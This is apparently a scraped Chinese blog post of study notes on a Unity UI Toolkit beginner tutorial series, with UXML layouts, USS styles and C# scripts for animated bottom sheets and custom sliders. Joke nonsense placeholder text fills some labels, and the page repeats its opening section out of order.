    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" style="flex-grow: 1; background-color: rgba(0, 0, 0, 0.75);" />
    <ui:VisualElement style="bottom: 0; height: 50%; width: 100%; position: absolute; border-top-left-radius: 40px; border-bottom-left-radius: 0; border-top-right-radius: 40px; border-bottom-right-radius: 0; background-color: rgb(255, 255, 255); align-items: center; padding-left: 50px; padding-right: 50px; padding-top: 50px; padding-bottom: 50px;">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement style="background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&amp;guid=c9c505e591b63904a901936e91e0ae2a&amp;type=3#Hyperspace - Projector&apos;); width: 438px; height: 400px;" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" class="textparagraph" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    .text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
    }

    .textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
    }

    ​Javascript 有 Jquery,Unity 有 UQuery!

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class UIController : MonoBehaviour
    {
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    // Start is called before the first frame update
    void Start()
    {
    var root = GetComponent<UIDocument>().rootVisualElement;
    _bottomContainer = root.Q<VisualElement>("Container_Bottom");
    _openButton = root.Q<Button>("Button_Open");
    _closeButton = root.Q<Button>("Button_Close");

    _bottomSheet = root.Q<VisualElement>("BottomSheet");
    _scrim = root.Q<VisualElement>("Scrim");

    _bottomContainer.style.display = DisplayStyle.None;

    _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
    _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.Flex;

    _bottomSheet.AddToClassList("bottomsheet--up");
    _scrim.AddToClassList("scrim--fadein");
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.None;

    _bottomSheet.RemoveFromClassList("bottomsheet--up");
    _scrim.RemoveFromClassList("scrim--fadein");
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    png

    UIDocument 里绑定好 UIController.cs。开跑!这会遗留出一个问题——关闭菜单时不显示动画。

    Unity UI Toolkit Beginner’s Guide 3: Scripting Animation

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement name="Container" style="background-color: rgba(255, 0, 0, 0); width: 100%; height: 100%; position: absolute; align-items: flex-start; top: 0; left: -4px;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" class="image--boy image--boy--inair" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgb(255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px; width: 100%;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 10px; padding-top: 10px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    <ui:Label text="我不敢苟同。我个人认为这个意大利面就应该拌 42 号混凝土。因为这个螺丝钉的长度,它很容易会直接影响到挖掘机的扭距,你往里砸的时候,一瞬间它就会产生大量的高能蛋白,俗称 UFO。会严重影响经济的发展。照你这么说,炸鸡块要用 92#汽油,毕竟我们无法用光学透镜探测苏格拉底,如果二氧化氢持续侵蚀这个机床组件,那么我们早晚要在斐波那契曲线上安装一个胶原蛋白,否则我们将无法改变蜜雪冰城与阿尔别克的叠加状态,因为众所周知爱吃鸡摩人在捕鲲的时候往往需要用氢的同位素当做诱饵,但是原子弹的新鲜程度又会直接影响到我国东南部的季风和洋流,所以说在西伯利亚地区开设农学院显然是不合理的。&amp;#10;&amp;#10;我知道你一定会反驳我,告诉我农业的底层思维是什么,就是不用化肥农药和种子,还包括生命之源氮气,使甲烷分子直接转化成能够捕获放射性元素释放的β射线的单质,并且使伽马射线在常温下就能用老虎钳折弯成 78°,否则在用望远镜观察细胞结构时,根本发现不了时空重叠时到底要叠几层才能使潼关肉夹馍更酥脆的原因。" display-tooltip-when-elided="true" style="flex-wrap: nowrap; align-items: stretch; justify-content: flex-start; white-space: normal; font-size: 32px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; padding-left: 40px; padding-right: 40px; padding-top: 20px; padding-bottom: 20px; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
    </ui:VisualElement>
    <ui:VisualElement style="padding-left: 80px; padding-right: 80px; height: 200px; justify-content: center;">
    <ui:Button text="坏的呢" display-tooltip-when-elided="true" name="Button_Open" class="button-blue" />
    </ui:VisualElement>
    </ui:VisualElement>
    <ui:VisualElement name="Container_Bottom" style="position: absolute; height: 100%; width: 100%; bottom: 0; display: flex;">
    <ui:VisualElement name="Scrim" class="scrim" />
    <ui:VisualElement name="BottomSheet" class="bottomsheet">
    <ui:Label text="第十三条鱼" display-tooltip-when-elided="true" class="text--title" />
    <ui:VisualElement name="image_Girl" class="image--girl image--girl--up" />
    <ui:Label text="应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~" display-tooltip-when-elided="true" name="Message" class="textparagraph" style="margin-top: 80px;" />
    <ui:Button display-tooltip-when-elided="true" name="Button_Close" style="position: absolute; right: 40px; top: 40px; background-image: url(&apos;project://database/Assets/Images/close.png?fileID=2800000&amp;guid=130e72ba771f8f64da9b05d9d557b2d5&amp;type=3#close&apos;); background-color: rgba(188, 188, 188, 0); border-left-width: 0; border-right-width: 0; border-top-width: 0; border-bottom-width: 0; width: 80px; height: 80px;" />
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:VisualElement>
    </ui:UXML>

    .button-blue {
    -unity-text-align: middle-center;
    padding-left: 60px;
    padding-right: 60px;
    transition-timing-function: ease-out;
    transition-duration: 0.3s;
    font-size: 30px;
    height: 100px;
    color: rgb(255, 255, 255);
    background-color: rgb(0, 102, 255);
    border-top-left-radius: 50px;
    border-bottom-left-radius: 50px;
    border-top-right-radius: 50px;
    border-bottom-right-radius: 50px;
    }

    .button-blue:hover {
    scale: 1.1 1.1;
    }

    .text--title {
    font-size: 80px;
    -unity-font-style: normal;
    -unity-text-align: upper-center;
    margin-top: 20px;
    margin-bottom: 20px;
    }

    .textparagraph {
    font-size: 40px;
    width: 100%;
    white-space: normal;
    }

    .bottomsheet {
    width: 100%;
    height: 50%;
    position: relative;
    background-color: rgba(255, 255, 255, 255);
    align-items: center;
    padding-left: 40px;
    padding-right: 40px;
    padding-top: 40px;
    padding-bottom: 40px;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-bounce;
    translate: 0 100%;
    }

    .bottomsheet--up {
    translate: 0 0;
    }

    .scrim {
    height: 50%;
    background-color: rgba(0, 0, 0, 0.5);
    transition-property: opacity;
    transition-duration: 0.5s;
    opacity: 0;
    }

    .scrim--fadein {
    opacity: 1;
    }

    .image--boy {
    background-color: rgba(255, 255, 255, 0);
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&guid=6a43c56327b2ded46a942d159deac62a&type=3#Hyperspace - Floating');
    height: 600px;
    width: 300px;
    transition-property: translate;
    transition-duration: 0.5s;
    transition-timing-function: ease-in-out-sine;
    translate: 0 0;
    }

    .image--boy--inair {
    translate: -500px -400px;
    }

    .image--girl {
    background-image: url('project://database/Assets/Images/Hyperspace%20-%20Projector.png?fileID=2800000&guid=c9c505e591b63904a901936e91e0ae2a&type=3#Hyperspace - Projector');
    width: 438px;
    height: 400px;
    translate: 0 60px;
    transition-property: translate;
    transition-timing-function: ease-out-sine;
    transition-duration: 0.5s;
    }

    .image--girl--up {
    translate: 0 0;
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;
    using DG.Tweening;

    public class UIController : MonoBehaviour
    {
    private VisualElement _bottomContainer;
    private Button _openButton;
    private Button _closeButton;
    private VisualElement _bottomSheet;
    private VisualElement _scrim;
    private VisualElement _boy;
    private VisualElement _girl;
    private Label _message;
    // Start is called before the first frame update
    void Start()
    {
    var root = GetComponent<UIDocument>().rootVisualElement;
    _bottomContainer = root.Q<VisualElement>("Container_Bottom");
    _openButton = root.Q<Button>("Button_Open");
    _closeButton = root.Q<Button>("Button_Close");

    _bottomSheet = root.Q<VisualElement>("BottomSheet");
    _scrim = root.Q<VisualElement>("Scrim");

    _boy = root.Q<VisualElement>("image_Boy");
    _girl = root.Q<VisualElement>("image_Girl");

    _message = root.Q<Label>("Message");

    _bottomContainer.style.display = DisplayStyle.None;

    _openButton.RegisterCallback<ClickEvent>(OnOpenButtonClicked);
    _closeButton.RegisterCallback<ClickEvent>(OnCloseButtonClicked);

    Invoke("AnimateBoy", 1f);

    _bottomSheet.RegisterCallback<TransitionEndEvent>(OnBottomSheetDown);
    }

    private void AnimateBoy()
    {
    _boy.RemoveFromClassList("image--boy--inair");
    }

    private void AnimateGirl()
    {
    _girl.ToggleInClassList("image--girl--up");
    _girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
    );

    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);
    }

    private void OnOpenButtonClicked(ClickEvent evt)
    {
    _bottomContainer.style.display = DisplayStyle.Flex;

    _bottomSheet.AddToClassList("bottomsheet--up");
    _scrim.AddToClassList("scrim--fadein");

    AnimateGirl();
    }

    private void OnCloseButtonClicked(ClickEvent evt)
    {
    _bottomSheet.RemoveFromClassList("bottomsheet--up");
    _scrim.RemoveFromClassList("scrim--fadein");
    }

    private void OnBottomSheetDown(TransitionEndEvent evt)
    {
    if (!_bottomSheet.ClassListContains("bottomsheet--up"))
    {
    _bottomContainer.style.display = DisplayStyle.None;
    }
    }

    // Update is called once per frame
    void Update()
    {
    Debug.Log(_girl.ClassListContains("image--girl--down"));
    }
    }

    ​核心是:

    Invoke("AnimateBoy", 1f);

    ​延迟调用 AnimateBoy 以正确加载动画。

    _girl.ToggleInClassList("image--girl--up");
    _girl.RegisterCallback<TransitionEndEvent>(
    evt => _girl.ToggleInClassList("image--girl--up")
    );

    ​实现循环动画。

    _message.text = string.Empty;
    string m = "应舍友的邀请来到了山西,一出车站就是晋城的旅游宣传图,名胜景点一点也不比我们商丘差!还有室友家的猫咪真可爱~";
    DOTween.To(() => _message.text, x => _message.text = x, m, 3f).SetEase(Ease.Linear);

    ​借助 Dotween 插件实现打字动画。

    Unity UI Toolkit Beginner’s Guide 4: Customizing Slider 1

    png

    ​整一个滑块的纹理。

    png

    ​创建一个 Slider,Background 设为滑块的 Sprite,打开 Sprite Editor 调整纹理的 Border

    png

    ​这个滑块下面不让改,只能用 USS 的类选择器修改样式。

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;" />
    </ui:UXML>
    #MySlider Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    background-color: rgb(222, 255, 184);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgba(0, 140, 255, 255);
    }

    ​这个 .bar 下面的 align-self: flex-end 在我这个版本的 Unity 里还没有,笑死,直接修改 USS 文件居然还能跑。

    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> evt)
    {
    Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 dist = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    m_NewDragger.transform.position = m_NewDragger.parent.WorldToLocal(pos - dist);
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    ​这个博主在结尾说了句如果用 UGUI 他之多需要 5 分钟就做完了,笑死,不好用。

    Unity UI Toolkit Beginner’s Guide 5: Customizing Slider 2

    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/CustomControls.uss?fileID=7433441132597879392&amp;guid=5fd61833565b17847ad044907679931d&amp;type=3#CustomControls" />
    <ui:Slider picking-mode="Ignore" label="Slider" value="59.4" high-value="100" name="MySlider" class="SliderLabel" style="background-image: url(&apos;project://database/Assets/Images/Slider_Dark.png?fileID=21300000&amp;guid=b51bf43bcb826ff43866734025cebf81&amp;type=3#Slider_Dark&apos;); width: 100%; height: 80px; margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0; translate: 0 200px;" />
    <ui:VisualElement class="bubble" style="display: none; left: 0;">
    <ui:Label text="24" display-tooltip-when-elided="true" class="bubble_label" style="display: flex;" />
    </ui:VisualElement>
    </ui:UXML>
    #MySlider > Label {
    opacity: 1;
    font-size: 32px;
    color: rgb(0, 73, 161);
    display: none;
    }

    #MySlider #unity-drag-container {
    margin-top: 25px;
    margin-right: 40px;
    margin-left: 40px;
    margin-bottom: 40px;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    height: 30px;
    width: 100%;
    overflow: hidden;
    border-top-left-radius: 10px;
    border-bottom-left-radius: 10px;
    border-top-right-radius: 10px;
    border-bottom-right-radius: 10px;
    }

    #MySlider #unity-tracker {
    background-color: rgb(35, 37, 41);
    top: 0;
    flex-grow: 1;
    position: relative;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    }

    #MySlider #unity-dragger {
    border-left-color: rgba(0, 0, 0, 0);
    border-right-color: rgba(0, 0, 0, 0);
    border-top-color: rgba(0, 0, 0, 0);
    border-bottom-color: rgba(0, 0, 0, 0);
    background-color: rgb(255, 254, 0);
    width: 20px;
    height: 100%;
    top: 0;
    flex-grow: 0;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    }

    .bar {
    width: 2000px;
    height: 100%;
    background-color: rgb(255, 94, 0);
    align-self: flex-end;
    }

    .newdragger {
    position: absolute;
    width: 80px;
    height: 80px;
    background-color: rgb(0, 140, 255);
    }

    .bubble {
    position: absolute;
    background-image: url('project://database/Assets/Images/Bubble.png?fileID=2800000&guid=b836b02351db7664d82b839e800143df&type=3#Bubble');
    width: 110px;
    height: 140px;
    opacity: 1;
    transition-property: scale, opacity;
    transition-duration: 1s, 1s;
    transition-timing-function: ease-out-elastic, ease-out-elastic;
    transform-origin: bottom;
    }

    .bubble_label {
    width: 100%;
    height: 75%;
    margin-left: 0;
    margin-right: 0;
    margin-top: 0;
    margin-bottom: 0;
    padding-left: 0;
    padding-right: 0;
    padding-top: 0;
    padding-bottom: 0;
    -unity-text-align: middle-center;
    font-size: 40px;
    -unity-font-style: bold;
    color: rgb(255, 255, 255);
    display: flex;
    }

    .bubble--hidden {
    opacity: 0;
    scale: 0.5 0.5;
    }
    using System.Collections;
    using System.Collections.Generic;
    using UnityEngine;
    using UnityEngine.UIElements;

    public class CustomSlider : MonoBehaviour
    {
    private VisualElement m_Root;
    private VisualElement m_Slider;
    private VisualElement m_Dragger;
    private VisualElement m_Bar;
    private VisualElement m_NewDragger;
    private VisualElement m_Bubble;
    private Label m_BubbleLabel;

    public Color color_A;
    public Color color_B;
    // Start is called before the first frame update
    void Start()
    {
    m_Root = GetComponent<UIDocument>().rootVisualElement;
    m_Slider = m_Root.Q<Slider>("MySlider");
    m_Dragger = m_Root.Q<VisualElement>("unity-dragger");

    AddElements();

    m_Slider.RegisterCallback<ChangeEvent<float>>(SliderValueChanged);

    m_Slider.RegisterCallback<GeometryChangedEvent>(SliderInit);

    m_Slider.RegisterCallback<PointerCaptureEvent>(_=>
    {
    m_Bubble.RemoveFromClassList("bubble--hidden");
    });

    m_Slider.RegisterCallback<PointerCaptureOutEvent>(_ =>
    {
    m_Bubble.AddToClassList("bubble--hidden");
    });
    }

    void AddElements()
    {
    m_Bar = new VisualElement();
    m_Dragger.Add(m_Bar);
    m_Bar.name = "Bar";
    m_Bar.AddToClassList("bar");

    m_NewDragger = new VisualElement();
    m_Slider.Add(m_NewDragger);
    m_NewDragger.name = "NewDragger";
    m_NewDragger.AddToClassList("newdragger");
    m_NewDragger.pickingMode = PickingMode.Ignore;

    m_Bubble = new VisualElement();
    m_Slider.Add(m_Bubble);
    m_Bubble.name = "Bubble";
    m_Bubble.AddToClassList("bubble");
    m_Bubble.AddToClassList("bubble--hidden");
    m_Bubble.pickingMode = PickingMode.Ignore;

    m_BubbleLabel = new Label();
    m_Bubble.Add(m_BubbleLabel);
    m_BubbleLabel.name = "Bubble_Label";
    m_BubbleLabel.AddToClassList("bubble_label");
    m_BubbleLabel.pickingMode = PickingMode.Ignore;
    }

    void SliderValueChanged(ChangeEvent<float> value)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;

    float v = Mathf.Round(value.newValue);

    m_BubbleLabel.text = v.ToString();

    m_Bar.style.backgroundColor = Color.Lerp(color_A, color_B, v / 100f);
    m_Bubble.style.unityBackgroundImageTintColor = Color.Lerp(color_A, color_B, v / 100f);
    }

    void SliderInit(GeometryChangedEvent evt)
    {
    Vector2 offset = new Vector2((m_NewDragger.layout.width - m_Dragger.layout.width) / 2, (m_NewDragger.layout.height - m_Dragger.layout.height) / 2);
    Vector2 offset_Bubble = new Vector2((m_Bubble.layout.width - m_Dragger.layout.width) / 2, (m_Bubble.layout.height - m_Dragger.layout.height) / 2 + 120f);
    Vector2 pos = m_Dragger.parent.LocalToWorld(m_Dragger.transform.position);
    pos = m_NewDragger.parent.WorldToLocal(pos);

    m_NewDragger.transform.position = pos - offset;
    m_Bubble.transform.position = pos - offset_Bubble;
    }

    // Update is called once per frame
    void Update()
    {

    }
    }

    Unity UI Toolkit Beginner’s Guide 6: Timeline Animation

    ​让 UI Toolkit 支持 Timeline 的插件。

    ]]>
    + 正文

    Unity UI Toolkit Beginner’s Guide 1: Layout & Style

    ​IMGUI → UGUI → UI Toolkit

    UI Toolkit 是 Unity 的新一代 UI!

    StyleStructure & LayoutInteractions
    WebCSSHTMLJavascript
    UnityUSSUXMLC#

    UI Toolkit 从网页前端中借鉴了思想,引入了 USSUXML 这两个概念。

    png

    Project 里创建一个 UI Document 以获得一个 UXML 文件。

    png

    Hierarchy 里创建一个 UI Document,绑定好 Panel SettingsSource Asset

    png

    ​打开 UXML,界面有点像 Dreamweaver?设置一下 Unity Default Runtime ThemeMatch Game ViewCanvas Background

    png

    ​一阵操作。这个 VisualElement 类比于 Web 里的 <div>,不过只能支持 display: flexLabel 就类比于 <p>

    png

    ​这个字体,可以使用 Font Asset Creator。看上去好厉害的样子!我还搞得不是很懂。

    png

    ​之前的操作全是行内样式,这不太好。创建一个 StyleSheets 以整一些样式表。在对象的 Style Class List 里绑定。

    ​最后得到的 UXML 文件:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    <ui:UXML xmlns:ui="UnityEngine.UIElements" xmlns:uie="UnityEditor.UIElements" xsi="http://www.w3.org/2001/XMLSchema-instance" engine="UnityEngine.UIElements" editor="UnityEditor.UIElements" noNamespaceSchemaLocation="../../UIElementsSchema/UIElements.xsd" editor-extension-mode="False">
    <Style src="project://database/Assets/UI%20Toolkit/SampleStyle.uss?fileID=7433441132597879392&amp;guid=48d91a976022c174a908be25c25254e3&amp;type=3#SampleStyle" />
    <ui:VisualElement style="background-color: rgba(255, 0, 0, 0); width: auto; height: 100%; position: relative; align-items: flex-start;">
    <ui:VisualElement style="width: 100%; height: 50%; background-color: rgba(172, 255, 0, 0); flex-direction: row; align-items: flex-end; flex-wrap: nowrap; justify-content: space-around;">
    <ui:VisualElement name="image_Boy" style="background-color: rgba(255, 255, 255, 0); background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Floating.png?fileID=2800000&amp;guid=6a43c56327b2ded46a942d159deac62a&amp;type=3#Hyperspace - Floating&apos;); height: 600px; width: 300px;" />
    <ui:VisualElement name="image_Robot" style="height: 600px; background-image: url(&apos;project://database/Assets/Images/Hyperspace%20-%20Robot%201.png?fileID=2800000&amp;guid=9d7b64daab80ffd4db3c6a72f09c391f&amp;type=3#Hyperspace - Robot 1&apos;); width: 300px;" />
    </ui:VisualElement>
    <ui:VisualElement style="background-color: rgba(255, 255, 255, 255); height: 50%; justify-content: space-around; padding-top: 40px;">
    <ui:VisualElement style="margin-left: 0; margin-right: 0; margin-top: 0; margin-bottom: 0;">
    <ui:Label text="论文" display-tooltip-when-elided="true" style="font-size: 60px; -unity-font-style: bold; -unity-text-align: upper-center; padding-bottom: 20px; padding-top: 20px; padding-right: 0; padding-left: 0; -unity-font: url(&apos;project://database/Assets/Fonts/wqy-zenhei.ttc?fileID=12800000&amp;guid=5bdc6a3612a077b47a43b74e916faf16&amp;type=3#wqy-zenhei&apos;);" />
